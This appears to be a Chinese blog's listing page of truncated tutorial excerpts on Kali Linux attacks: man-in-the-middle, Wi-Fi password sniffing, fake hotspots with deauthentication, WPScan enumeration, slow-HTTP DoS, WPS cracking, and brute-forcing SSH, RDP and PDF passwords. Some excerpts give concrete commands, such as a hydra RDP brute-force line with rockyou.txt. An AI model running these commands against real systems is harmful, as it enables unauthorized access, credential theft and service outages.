使用Kali Linux执行中间人攻击(演示)
中间人攻击也叫Man-In-The-Middle-Attack。 我假设你已经知道中间人攻击的基本概念,引用一段wikipedia: 中间人攻击(Man-in-the-middle attack,缩写:MITM)是指攻击者与通讯的两端分别建立独立的联系,并交换其所收到的数据,使通讯的两……
集线器、交换机和路由器的区别
集线器、交换机和路由器都是计算机网络设备,而且非常容易混淆。那么集线器、交换机和路由器有什么区别呢? 用简单的话说,就是智商高低。路由器最智能、集线器最傻。 集线器、交换机和路由器都允许你把一个或多个计算机连接到其他计算机、网络设备等。每个都有多个网络接口,允许你插入网线接入网络,但……
在Wifi网络中嗅探明文密码(HTTP POST请求、POP等)
全世界,现在大约50%的网站没有使用SSL加密,天朝尤其多。 我们都知道通过HTTP发送的数据都是明文,没有使用任何加密,即使是在数据敏感的登录页面。 本文的目的是:如果你在不熟悉的网络环境中,要注意提高警惕。 没有人希望自己的密码暴露给他人,so,不要嗅探(狗)他人的密码。 想象有一个……
使用WPScan破解wordpress站点密码
我这里使用的Kali Linux,它默认安装了WPScan。 在使用WPScan之前,先更新它的漏洞数据库: # wpscan –update 扫描wordpress用户 wpscan -–url [wordpress网址] –-enumerate u 以我的网站为例: # wpscan --url http://blog.topspeedsnail.com --enumerate u 注意:要用使用两个–,否则报错-“The WordPress……
使用Hydra通过ssh破解密码
Hydra是非常高效的网络登录破解工具,它可以对多种服务程序执行暴力破解(SSH、VNC等等)。 防止这种攻击其实很容易,方法很多。以SSH为例: Ubuntu:使用Port Knocking隐藏SSH端口 在Ubuntu中用Fail2Ban保护SSH CentOS 7安装使用Fail2Ban保护SS……
创建假的wifi热点
本帖介绍怎么创建假的wifi热点,然后抓取连接到这个wifi用户的敏感数据。我们还会给周围的无线路由器发送未认证的包,使这些路由器瘫痪,强迫用户连接(或自动连接)我们创建的假wifi热点。 这种攻击也叫”水坑攻击”-把其他用户都聚集到一个”坑”中。 系统要求: Kali Linux 本地有线网络连接(网……
使用pdfcrack破解PDF密码(Linux)
pdfcrack是破解PDF保护密码的Linux命令行工具。 安装pdfcrack Debian系列: # apt install pdfcrack 暴力破解 # pdfcrack -f filename.pdf -n 6 -m 8 -c 0123456789 暴力破解密码是漫长单调的过程。 上面使用的参数解释: -n:密码最短多少个字符 -m:密码最长多少个字符 -c:使用的字符集 更多选项,查看帮助: # man pdfcrack 你可……
SlowHTTPTest-慢速DoS攻击
Slowhttptest是一个依赖于实际HTTP协议的Slow HTTP DoS攻击工具,它的设计原理是要求服务器所有请求被完全接收后再进行处理。 SlowHTTPTest是一款对服务器进行慢攻击的测试软件,所谓的慢攻击就是相对于cc或者DDoS的快而言的,并不是只有量大速度快才能把服务器搞……
暴力破解Windows RDP(3389)
RDP是远程桌面协议。 $ nmap your_target Starting Nmap 7.01 ( https://nmap.org ) at 2016-09-20 17:29 CST Nmap scan report for ns514636.ip-192-95-xx.net (192.95.xx.xx) Host is up (0.28s latency). Not shown: 988 closed ports PORT STATE SERVICE 135/tcp filtered msrpc 139/tcp filtered netbios-ssn 445/tcp filtered microsoft-ds 593/tcp filtered http-rpc-epmap 3389/tcp open ms-wbt-server # 这个是远程桌面端口 4444/tcp filtered krb524 6667/tcp filtered irc 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49163/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 28.14 seconds 使用hydra暴力破解: hydra -t 4 -V -l administrator -P /usr/share/wordlists/rockyou.txt rdp://your_target -t = TASKS run TASKS number of connects in parallel (per host, default: 16) RDP set to maximum……
使用Reaver破解开启了WPS功能的wifi密码(wpa/wpa2)
来自wikipeida: Wi-Fi保护设置(简称WPS,全称Wi-Fi Protected Setup)是一个无线网络安全标准,旨在让家庭用户使用无线网络时简化加密步骤。此标准由Wi-Fi联盟(Wi-Fi Alliance)于2006年制定。 在2011年12月28日安全专家Stefan Viehbock……